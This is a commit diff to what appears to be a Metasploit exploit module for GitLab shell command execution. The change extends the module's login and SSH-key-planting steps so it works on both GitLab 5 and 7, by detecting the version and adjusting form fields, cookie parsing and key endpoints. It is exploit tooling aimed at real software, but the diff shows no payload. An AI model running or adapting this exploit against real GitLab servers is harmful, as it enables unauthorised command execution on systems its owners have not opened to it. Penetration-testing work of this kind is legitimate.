Modifications for login and key addition

This commit adds additional support for logging in
on multiple versions of Gitlab as well as adding a
key to exploit the vulnerability.

Author: kaospunk

modules/exploits/multi/http/gitlab_shell_exec.rb

@@ -96,9 +96,17 @@ def login
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
 
-    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
 
+    if res.body.include? 'user[email]'
+      @gitlab_version = 5
+      user_field = 'user[email]'
+    else
+      @gitlab_version = 7
+      user_field = 'user[login]'
+    end
+
     # Perform the actual login and get the newly assigned session cookie
     res = send_request_cgi(
                             'method' => 'POST',
@@ -108,26 +116,30 @@ def login
                               {
                                 'utf8' => "\xE2\x9C\x93",
                                 'authenticity_token' => auth_token,
-                                'user[login]' => username,
+                                "#{user_field}" => username,
                                 'user[password]' => password,
                                 'user[remember_me]' => 0
                               }
                           )
 
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
 
-    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
+    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
   end
 
   def add_key(cmd)
-    add_key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+    if @gitlab_version == 5
+      @key_base = normalize_uri(datastore['TARGETURI'], 'keys')
+    else
+      @key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+    end
 
     # Perform an initial request to get an authenticity_token so the actual
     # key addition can be done successfully.
     res = send_request_cgi(
                             'method' => 'GET',
                             'cookie' => "request_method=GET; #{@session_cookie}",
-                            'uri'    => normalize_uri(add_key_base, 'new')
+                            'uri'    => normalize_uri(@key_base, 'new')
     )
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
@@ -149,7 +161,7 @@ def add_key(cmd)
     res = send_request_cgi(
                             'method' => 'POST',
                             'cookie' => "request_method=GET; #{@session_cookie}",
-                            'uri'    => add_key_base,
+                            'uri'    => @key_base,
                             'vars_post' =>
                               {
                                 'utf8' => "\xE2\x9C\x93",
@@ -168,12 +180,10 @@ def add_key(cmd)
   end
 
   def delete_key(key_id)
-    key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
-
     res = send_request_cgi(
                              'method' => 'GET',
                              'cookie' => "request_method=GET; #{@session_cookie}",
-                             'uri'    => key_base
+                             'uri'    => @key_base
                            )
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
@@ -184,7 +194,7 @@ def delete_key(key_id)
     res = send_request_cgi(
                              'method' => 'POST',
                              'cookie' => "#{@session_cookie}",
-                             'uri'    => normalize_uri("#{key_base}", "#{key_id}"),
+                             'uri'    => normalize_uri("#{@key_base}", "#{key_id}"),
                              'vars_post' =>
                              {
                                '_method' => 'delete',